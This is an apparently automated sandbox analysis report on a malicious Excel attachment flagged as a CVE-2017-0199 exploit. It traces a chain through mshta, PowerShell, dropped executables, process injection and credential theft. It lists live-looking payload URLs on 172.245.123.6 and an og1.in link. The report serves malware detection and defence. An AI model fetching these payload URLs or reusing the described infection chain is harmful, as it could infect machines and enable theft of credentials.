new ROOT certificates 26->110 112 Powershell drops PE file 26->112 32 dllhost.exe 1 26->32         started        35 csc.exe 2 26->35         started        38 dllhost.exe 30->38         started        40 csc.exe 30->40         started        signatures14 process15 file16 90 Machine Learning detection for dropped file 32->90 92 Writes to foreign memory regions 32->92 94 Maps a DLL or memory area into another process 32->94 96 Switches to a custom stack to bypass stack traces 32->96 42 RegSvcs.exe 12 2 32->42         started        52 C:\Users\user\AppData\Local\...\ngxpd0hb.dll, PE32 35->52 dropped 46 cvtres.exe 35->46         started        48 RegSvcs.exe 38->48         started        54 C:\Users\user\AppData\Local\...\tnesdt30.dll, PE32 40->54 dropped 50 cvtres.exe 40->50         started        signatures17 process18 dnsIp19 70 reallyfreegeoip.org 188.114.96.3, 443, 49174, 49175 CLOUDFLARENETUS European Union 42->70 72 checkip.dyndns.org 42->72 78 6 other IPs or domains 42->78 74 reallyfreegeoip.org 48->74 76 checkip.dyndns.org 48->76 114 Tries to steal Mail credentials (via file / registry access) 48->114 116 Tries to harvest and steal browser information (history, passwords, etc) 48->116 signatures20 118 Tries to detect the country of the analysis system (by using the IP) 74->118

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SYSN ORDER.xls21%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
            SYSN ORDER.xls26%VirustotalBrowse
            SYSN ORDER.xls100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\dllhost.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe100%Joe Sandbox ML

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            reallyfreegeoip.org0%VirustotalBrowse
            checkip.dyndns.com0%VirustotalBrowse
            checkip.dyndns.org0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://ocsp.entrust.net030%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://checkip.dyndns.org/q0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            http://checkip.dyndns.com0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
            https://og1.in/cIP5a80%VirustotalBrowse
            https://og1.in/0%VirustotalBrowse
            http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta8%VirustotalBrowse
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
            http://www.diginotar.nl/cps/pkioverheid00%VirustotalBrowse
            http://172.245.123.6/1%VirustotalBrowse
            http://reallyfreegeoip.org0%VirustotalBrowse
            http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htahttp://172.245.123.6/xampp/crio/IEnetbo7%VirustotalBrowse
            http://crl.entrust.net/server1.crl00%VirustotalBrowse
            http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta...7%VirustotalBrowse
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
            http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaC:7%VirustotalBrowse
            http://172.245.123.6/770/dllhost.exes7%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            og1.in
            		172.67.216.244
            		truefalse
              		unknown
              reallyfreegeoip.org
              		188.114.96.3
              		truetrueunknown
              checkip.dyndns.com
              		193.122.130.0
              		truefalseunknown
              checkip.dyndns.org
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://og1.in/cIP5a8falseunknown
              http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htatrueunknown
              http://checkip.dyndns.org/false
              • URL Reputation: safe
              		unknown
              https://reallyfreegeoip.org/xml/8.46.123.33false
              • URL Reputation: safe
              		unknown
              http://172.245.123.6/770/dllhost.exetrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaAmshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta...EEBDD-A8mshta.exe, 00000004.00000003.420063943.000000000305C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420394140.000000000305C000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://og1.in/mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420177418.00000000002B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420256019.00000000002B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417961702.00000000002B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471062892.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.467118716.0000000000142000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472118068.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472462017.0000000003730000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    http://ocsp.entrust.net03mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://og1.in/cIP5a8Omshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://og1.in/cIP5a8Hmshta.exe, 00000004.00000003.417457596.00000000030B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.00000000030B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.00000000030B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.00000000030B6000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000007.00000002.448635325.0000000012391000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://og1.in/cIP5a8Kmshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://172.245.123.6/Cmshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta0mshta.exe, 0000000C.00000003.468426129.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.000000000375C000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                              http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                              https://reallyfreegeoip.org/xml/8.46.123.334RegSvcs.exe, 0000000E.00000002.630259466.00000000026AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002649000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002448000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta7mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://go.microspowershell.exe, 00000007.00000002.441192247.000000000386C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta4mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://og1.in/=#mshta.exe, 0000000C.00000002.472462017.0000000003730000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaetmshta.exe, 0000000C.00000003.468426129.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.000000000375C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htahttp://172.245.123.6/xampp/crio/IEnetbomshta.exe, 00000004.00000003.417386530.00000000027A5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.467894962.0000000002B45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470616202.0000000002B45000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                          http://172.245.123.6/mshta.exe, 0000000C.00000003.470945172.0000000003804000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.0000000003804000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.0000000003804000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.0000000003804000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                          https://og1.in/cIP5a8mSYSN ORDER.xls, B8230000.0.drfalse
                                            		unknown
                                            http://checkip.dyndns.org/qRegSvcs.exe, 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://contoso.com/powershell.exe, 00000007.00000002.448635325.0000000012391000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.448635325.0000000012391000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://reallyfreegeoip.orgRegSvcs.exe, 0000000E.00000002.630259466.00000000026AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.000000000261F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.000000000241E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                            https://og1.in/cIP5a8&Wmshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://checkip.dyndns.comRegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://ocsp.entrust.net0Dmshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.441192247.0000000002361000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.478774316.0000000002421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://reallyfreegeoip.orgPLZRegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://reallyfreegeoip.org/xml/RegSvcs.exe, 0000000E.00000002.630259466.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://og1.in/cIP5a8pdate.htamshta.exe, 0000000C.00000002.472462017.0000000003730000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.448635325.0000000012391000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaC:mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                    http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                    https://contoso.com/Iconpowershell.exe, 00000007.00000002.448635325.0000000012391000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://og1.in/cIP5a8$mshta.exe, 00000004.00000002.420227515.000000000024D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta...mshta.exe, 0000000C.00000003.467118716.0000000000142000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472118068.0000000000131000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                      http://checkip.dyndns.orgRegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002649000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000025FA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000023F9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002448000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htasmshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://crl.mpowershell.exe, 00000007.00000002.450490527.000000001C26D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
